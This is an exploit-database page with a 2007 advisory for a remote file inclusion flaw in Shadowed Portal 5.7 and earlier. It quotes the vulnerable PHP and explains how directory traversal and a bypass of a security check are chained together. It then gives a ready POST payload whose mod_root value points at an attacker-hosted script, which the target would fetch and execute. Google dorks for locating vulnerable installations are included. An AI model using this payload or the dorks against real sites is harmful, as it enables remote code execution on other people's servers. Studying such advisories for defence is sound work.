0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Shadowed Portal <= 5.7d3 (POST) Remote File Inclusion Vulnerability
=================================================================== Shadowed Portal <= 5.7d3 (POST) Remote File Inclusion Vulnerability =================================================================== ____ __________ __ ____ __ /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ | | | \ | |/ \ \___| | /_____/ | || | |___|___| /\__| /______ /\___ >__| |___||__| \/\______| \/ \/ ------------------------------------------------------------------------------------------------ This is a Public Exploit. 21/12/2007 (dd-mm-yyyy) ------------------------------------------------------------------------------------------------ § Shadowed Portal 5.7 and maybe lower - Remote File Includes (Require) Vulnerabilities § Vendor: http://www.shad0wed.com Severity: Highest Author: The:Paradox Proud to be Italian. ------------------------------------------------------------------------------------------------ Related Codes: -- control.php; line 1: <?php require("config.php"); require("globals.php"); require("functions.php"); require("variables.php"); $return = setvar("return"); if($act == "login") { $online = 0; $usr = $_POST['usr']; $pwd = $_POST['pwd']; if(file_exists($root."/users/".strtolower($usr).".php")) { require($root."/users/".strtolower($usr).".php"); } -- globals.php; line 1: <?php define('CHECK',md5("null")); global $viv; global $mod; global $act; global $do; global $act; global $id; global $tp; global $w; global $method; global $board; global $user; global $pass; global $cat; global $linkback; global $HTTP_POST_VARS; global $_GET; global $_POST; global $_FILES; global $HTTP_REFERER; global $_SERVER; -- /modules/fs/mod.php; line 1: <?php if(!defined('CHECK')) { exit; } require($mod_root."/config.php"); ------------------------------------------------------------------------------------------------ Bug Explanation: This Portal presents a vulnerability in the "login system" that allows us to require a page ".php" in the directory "/users/" (whatever using directory transversal ("../") we can require any page). Additionally "Check" was defined by the required page globals.php, allowing us to bypass the "security-die" on the top of most php page (see /modules/fs/mod.php; line 1). If we require "/modules/fs/mod.php" with a $mod_root value, we can require an external page of the site. We can do Post Request to control.php?act=login with post values: usr=../modules/fs/mod&pwd=casualpass&mod_root=http://yoursite.org/yourscript? and get RFI. ------------------------------------------------------------------------------------------------ The require in control.php is extremely unsafe, it could be used with other pages to obtain other vulnerabilities. ------------------------------------------------------------------------------------------------ Google Dork-> Powered by Shadowed Portal Google Dork-> These script's code is Copyright 2003-2006 by Shadowed Works. ------------------------------------------------------------------------------------------------ Use this exploit at your own risk. You are responsible for your own deeds. ------------------------------------------------------------------------------------------------ Use your brain, do not lame. Enjoy. =) # 0day.today [2024-12-25] #